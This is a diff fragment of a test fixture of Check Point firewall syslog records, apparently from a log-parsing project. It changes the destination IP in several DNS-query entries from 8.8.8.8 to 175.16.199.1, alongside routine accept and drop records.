 <134>1 2020-03-29T19:32:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7d6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:32:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7da,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
 <134>1 2020-03-29T19:32:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7da,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
-<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510370"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510370"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80f7ed,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44606"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56968"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37686"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -4373,10 +4373,10 @@
 <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46546"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10299"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7ec,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46548"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10300"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T19:33:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80f7f4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46030"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53664"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:33:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510390"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53664"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T19:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f800,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510400"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T19:33:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f801,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:33:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f81c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45449"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T19:33:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f81c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.47"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39002"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10301"; xlatesrc:"0.0.0.0"]
@@ -4415,12 +4415,12 @@
 <134>1 2020-03-29T19:35:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f87e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51192"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T19:35:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f87e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51193"; service:"443"; service_id:"https"; src:"192.168.1.117"]
